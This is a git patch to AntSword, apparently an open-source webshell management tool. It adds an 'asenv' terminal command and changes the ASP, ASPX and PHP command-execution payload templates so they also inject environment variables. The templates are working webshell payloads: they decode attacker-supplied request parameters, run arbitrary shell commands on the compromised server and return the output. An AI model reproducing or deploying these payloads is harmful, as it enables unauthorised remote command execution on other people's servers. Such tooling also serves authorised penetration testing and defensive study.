From 9085af9f01cad18d3385724cd75a64543525d117 Mon Sep 17 00:00:00 2001 From: Medicean Date: Tue, 3 Dec 2019 15:21:45 +0800 Subject: [PATCH] =?UTF-8?q?(Enhance:=20Terminal)=20=E6=96=B0=E5=A2=9E=20`a?= =?UTF-8?q?senv`=20=E6=9C=AC=E5=9C=B0=E6=8C=87=E4=BB=A4,=20=E7=94=A8?= =?UTF-8?q?=E4=BA=8E=E6=89=8B=E5=8A=A8=E8=AE=BE=E7=BD=AE=E5=BD=93=E5=89=8D?= =?UTF-8?q?=E7=BB=88=E7=AB=AF=E4=B8=8B=E7=9A=84=E7=8E=AF=E5=A2=83=E5=8F=98?= =?UTF-8?q?=E9=87=8F?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- CHANGELOG.md | 24 ++++++++++++++++++++ source/core/asp/template/command.js | 24 +++++++++++++++++--- source/core/aspx/template/command.js | 31 +++++++++++++++++++++++--- source/core/custom/template/command.js | 3 ++- source/core/php/template/command.js | 14 ++++++++++-- source/language/en.js | 1 + source/language/zh.js | 1 + source/language/zh_hk.js | 1 + source/language/zh_tw.js | 1 + source/modules/terminal/index.js | 21 +++++++++++++++-- 10 files changed, 110 insertions(+), 11 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 0e329e13..f05221e8 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -7,6 +7,16 @@ ### 核心 * 修复全局过滤 xss 时 text 和 buff 过滤规则不一致问题 +* core.command.exec 增加第 3个参数 env + + 格式为: `key1|||askey|||val1|||asline|||key2|||askey|||val2|||asline|||` + + 对应的环境变量为: + +``` +key1=val1 +key2=val2 +``` ### 数据管理 @@ -28,6 +38,20 @@ * 新建文件默认内容更改为 `#Halo AntSword!` +### 虚拟终端 + +* 新增 `asenv` 本地指令, 用于手动设置当前终端下的环境变量 + +Linux: + +![terminal_asenv_1.png](https://i.loli.net/2019/12/03/k3AgCmlNbIM8QDZ.png) + +Windows: + +![terminal_asenv_2.png](https://i.loli.net/2019/12/03/uzjvAgRT1Bdbkhw.png) + +> 注意: asp 下设置之后, 当前机器上的IIS子进程都会受影响, 过一段时间子进程退出后正常 + ### 其它 * ACE 编辑器增加 `ace/mode/antswordjwt` 语法模式, 支持 JWT Token 语法高亮 diff --git a/source/core/asp/template/command.js b/source/core/asp/template/command.js index 2c570e24..c96c4f3d 100644 --- a/source/core/asp/template/command.js +++ b/source/core/asp/template/command.js @@ -2,11 +2,29 @@ * 命令执行模板 */ -module.exports = (arg1, arg2) => ({ +module.exports = (arg1, arg2, arg3) => ({ exec: { - _: `Set X=CreateObject("wscript.shell").exec(""""&bd(Request("${arg1}"))&""" /c """&bd(Request("${arg2}"))&""""):If Err Then:S="[Err] "&Err.Description:Err.Clear:Else:O=X.StdOut.ReadAll():E=X.StdErr.ReadAll():S=O&E:End If:Response.write(S)`, + _: `Set PutEnv=CreateObject("WScript.Shell").Environment("Process"): + envstr=Split(""&bd(Request("${arg3}"))&"", "|||asline|||"): + For Each envline in envstr: + If Len(envline)>0 Then: + ss=Split(envline, "|||askey|||"): + PutEnv(ss(0))=ss(1): + End If: + Next: + Set X=CreateObject("wscript.shell").exec(""""&bd(Request("${arg1}"))&""" /c """&bd(Request("${arg2}"))&""""): + If Err Then: + S="[Err] "&Err.Description: + Err.Clear: + Else: + O=X.StdOut.ReadAll(): + E=X.StdErr.ReadAll(): + S=O&E: + End If: + Response.write(S)`.replace(/\n\s+/g, ''), [arg1]: "#{hex::bin}", - [arg2]: "#{hex::cmd}" + [arg2]: "#{hex::cmd}", + [arg3]: "#{hex::env}", }, listcmd: { _: `AA=Split(""&bd(Request("${arg1}"))&"",","): diff --git a/source/core/aspx/template/command.js b/source/core/aspx/template/command.js index 555c2d0e..419d74ef 100644 --- a/source/core/aspx/template/command.js +++ b/source/core/aspx/template/command.js @@ -2,11 +2,36 @@ * 命令执行模板 */ -module.exports = (arg1, arg2) => ({ +module.exports = (arg1, arg2, arg3) => ({ exec: { - _: `var c=new System.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg1}"])));var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c "+System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg2}"]));e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd()+EI.ReadToEnd());`, + _: `var c=new System.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg1}"]))); + var e=new System.Diagnostics.Process(); + var out:System.IO.StreamReader,EI:System.IO.StreamReader; + c.UseShellExecute=false; + c.RedirectStandardOutput=true; + c.RedirectStandardError=true; + e.StartInfo=c; + c.Arguments="/c "+System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg2}"])); + if(Request.Item["${arg3}"]) { + var envstr = System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg3}"])); + var envarr = envstr.split("|||asline|||"); + var i; + for (var i in envarr) { + var ss = envarr[i].split("|||askey|||"); + if (ss.length != 2) { + continue; + } + c.EnvironmentVariables.Add(ss[0],ss[1]); + } + } + e.Start(); + out=e.StandardOutput; + EI=e.StandardError; + e.Close(); + Response.Write(out.ReadToEnd() + EI.ReadToEnd());`.replace(/\n\s+/g, ''), [arg1]: "#{base64::bin}", - [arg2]: "#{base64::cmd}" + [arg2]: "#{base64::cmd}", + [arg3]: "#{base64::env}" }, listcmd: { _: `var binarr=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg1}"])); diff --git a/source/core/custom/template/command.js b/source/core/custom/template/command.js index c530c43d..3ea77b0d 100644 --- a/source/core/custom/template/command.js +++ b/source/core/custom/template/command.js @@ -6,7 +6,8 @@ module.exports = () => ({ exec: { _: 'M', 'z1': '#{bin}', - 'z2': '#{cmd}' + 'z2': '#{cmd}', + 'z3': '#{env}' }, listcmd: { _: 'Y', diff --git a/source/core/php/template/command.js b/source/core/php/template/command.js index ffb58464..3eb3f1cc 100644 --- a/source/core/php/template/command.js +++ b/source/core/php/template/command.js @@ -2,10 +2,11 @@ * 虚拟终端命令执行 */ -module.exports = (arg1, arg2) => ({ +module.exports = (arg1, arg2, arg3) => ({ exec: { _: `$p=base64_decode($_POST["${arg1}"]); $s=base64_decode($_POST["${arg2}"]); + $envstr=@base64_decode($_POST["${arg3}"]); $d=dirname($_SERVER["SCRIPT_FILENAME"]); $c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\""; if(substr($d,0,1)=="/"){ @@ -13,6 +14,14 @@ module.exports = (arg1, arg2) => ({ }else{ @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;"); } + if(!empty($envstr)){ + $envarr=explode("|||asline|||", $envstr); + foreach($envarr as $v) { + if (!empty($v)) { + @putenv(str_replace("|||askey|||", "=", $v)); + } + } + } $r="{$p} {$c}"; function fe($f){ $d=explode(",",@ini_get("disable_functions")); @@ -94,7 +103,8 @@ module.exports = (arg1, arg2) => ({ $ret=@runcmd($r." 2>&1"); print ($ret!=0)?"ret={$ret}":"";`.replace(/\n\s+/g, ''), [arg1]: "#{base64::bin}", - [arg2]: "#{base64::cmd}" + [arg2]: "#{base64::cmd}", + [arg3]: "#{base64::env}" }, listcmd: { _: `$arr=explode(",",base64_decode($_POST["${arg1}"])); diff --git a/source/language/en.js b/source/language/en.js index c6321bc3..145ec2a0 100644 --- a/source/language/en.js +++ b/source/language/en.js @@ -222,6 +222,7 @@ module.exports = { ascmd: { help: 'Enter ashelp to view local commands', ashelp: `Usage: + asenv [Key=Value]\t\tSet or Display Environment Variables, eg: asenv AAA=BBB ascmd [file]\t\tExecute the command with file, eg: ascmd /bin/bash aslistcmd\t\tList available command interpreters aspowershell [on|off]\t\tEnable/Disable PowerShell mode, eg: aspowershell on diff --git a/source/language/zh.js b/source/language/zh.js index d6d136ec..f97db50f 100644 --- a/source/language/zh.js +++ b/source/language/zh.js @@ -222,6 +222,7 @@ module.exports = { ascmd: { help: '输入 ashelp 查看本地命令', ashelp: `使用帮助: + asenv [Key=Value]\t\t设置或显示环境变量, eg: asenv AAA=BBB ascmd [file]\t\t指定file来执行命令, eg: ascmd /bin/bash aslistcmd\t\t列出可使用的命令解释器 aspowershell [on|off]\t\t启用/关闭PowerShell模式, eg: aspowershell on diff --git a/source/language/zh_hk.js b/source/language/zh_hk.js index c990ff8c..782e9d14 100644 --- a/source/language/zh_hk.js +++ b/source/language/zh_hk.js @@ -221,6 +221,7 @@ module.exports = { ascmd: { help: '輸入 ashelp 查看本地命令', ashelp: `使用幫助: + asenv[Key=Value]\t\t設置或顯示環境變量, eg: asenv AAA=BBB ascmd [file]\t\t指定file來執行命令, eg: ascmd /bin/bash aslistcmd\t\t列出可使用的命令解釋器 aspowershell [on|off]\t\t啟用/關閉PowerShell模式, eg: aspowershell on diff --git a/source/language/zh_tw.js b/source/language/zh_tw.js index ec0b5148..34fc5450 100644 --- a/source/language/zh_tw.js +++ b/source/language/zh_tw.js @@ -221,6 +221,7 @@ module.exports = { ascmd: { help: '輸入 ashelp 查看本地命令', ashelp: `使用幫助: + asenv[Key=Value]\t\t設置或顯示環境變量, eg: asenv AAA=BBB ascmd [file]\t\t指定file來執行命令, eg: ascmd /bin/bash aslistcmd\t\t列出可使用的命令解釋器 aspowershell [on|off]\t\t啟用/關閉PowerShell模式, eg: aspowershell on diff --git a/source/modules/terminal/index.js b/source/modules/terminal/index.js index 48313145..a7db6631 100644 --- a/source/modules/terminal/index.js +++ b/source/modules/terminal/index.js @@ -50,6 +50,7 @@ class Terminal { this.sess_powershell = null; this.core = new antSword['core'][opts['type']](opts); this.cache = new antSword['CacheManager'](this.opts['_id']); + this.asenvironmet = {}; this .getInformation() @@ -274,6 +275,19 @@ class Terminal { } return; } + if (cmd.substr(0, 5) === 'asenv') { + var envstr = cmd.substr(5).trim(); + if (envstr.length > 0 && envstr.indexOf('=') > 0) { + var k = envstr.substr(0, envstr.indexOf('=')).trim(); + var v = envstr.substr(envstr.indexOf('=') + 1).trim(); + this.asenvironmet[k] = v; + } else { + Object.keys(this.asenvironmet).map((k) => { + term.echo(`${antSword.noxss(k)}=${antSword.noxss(this.asenvironmet[k])}`); + }); + } + return; + } term.pause(); // 是否有缓存 let cacheTag = 'command-' + Buffer @@ -308,7 +322,10 @@ class Terminal { .core .request(this.core.command.exec({ cmd: this.parseCmd(cmd, this.path), - bin: _bin + bin: _bin, + env: Object.keys(this.asenvironmet).map((k) => { + return `${k}|||askey|||${this.asenvironmet[k]}|||asline|||`; + }).join(''), })) .then((ret) => { let _ = antSword.unxss(ret['text'], false); @@ -365,7 +382,7 @@ class Terminal { exit: false, // < 1.0.0 时使用3个参数 completion: (term, value, callback) => {} completion: (value, callback) => { - callback(['ashelp', 'ascmd', 'aslistcmd', 'aspowershell', 'quit', 'exit'].concat( + callback(['asenv', 'ashelp', 'ascmd', 'aslistcmd', 'aspowershell', 'quit', 'exit'].concat( this.isWin ? [ 'dir', 'whoami', 'net', 'ipconfig', 'netstat', 'cls', 'wscript', 'nslookup', 'copy', 'del', 'ren', 'md', 'type', 'ping' ] : [